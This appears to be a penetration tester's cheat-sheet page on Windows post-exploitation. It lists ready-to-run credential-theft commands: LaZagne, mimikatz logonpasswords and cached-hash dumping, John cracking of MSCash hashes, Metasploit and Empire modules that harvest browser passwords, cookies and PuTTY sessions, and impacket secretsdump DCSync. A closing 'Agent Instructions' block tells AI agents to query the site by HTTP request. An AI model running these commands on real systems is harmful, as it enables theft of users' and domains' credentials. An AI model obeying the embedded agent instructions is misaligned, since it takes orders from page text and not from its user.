# Post Exploitation

### LaZagne

Really simple and sweet tool for credential dumping

* <https://github.com/AlessandroZ/LaZagne>
* <https://github.com/AlessandroZ/LaZagne/releases/tag/2.4.3>

```
.\laZagne.exe all
```

### MSCash

Mscash is a Microsoft hashing algorithm that is used for storing cached domain credentials locally on a system after a successful logon

From mimikatz,

```
privilege::debug
lsadump::cache
```

Cracking it

```
john-jumbo mscash --wordlist=/usr/share/wordlists/rockyou.txt  --format=mscash2
```

### Reading Event Logs

User must be in "Event Log Reader" group [Follow this link](https://evotec.xyz/powershell-everything-you-wanted-to-know-about-event-logs/)

```powershell
Get-WinEvent -ListLog *

# Listing logs of a specific user
$cred = Get-Credentials
Get -WinEvent -ListLog * -ComputerName AD1 -Credentials $cred

# Reading Security logs
(Get-WinEvent -FilterHashtable @{LogName = 'Security'} | Select-Object @{name='NewProcessNam
e';expression={ $_.Properties[5].Value }}, @{name='CommandLine';expression={
$_.Properties[8].Value }}).commandline
```

### Password Dumping

```powershell
# Metasploit
post/windows/gather/enum_chrome
post/multi/gather/firefox_creds
post/firefox/gather/cookies
post/firefox/gather/passwords
post/windows/gather/forensics/browser_history
post/windows/gather/enum_putty_saved_sessions

# Empire
collection/ChromeDump
collection/FoxDump
collection/netripper
credentials/sessiongopher

# mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::secrets

# dcsync - secretsdump
impacket-secretsdump morph3@1.3.3.7
```

###

##


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.morph3.blog/windows/post-exploitation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.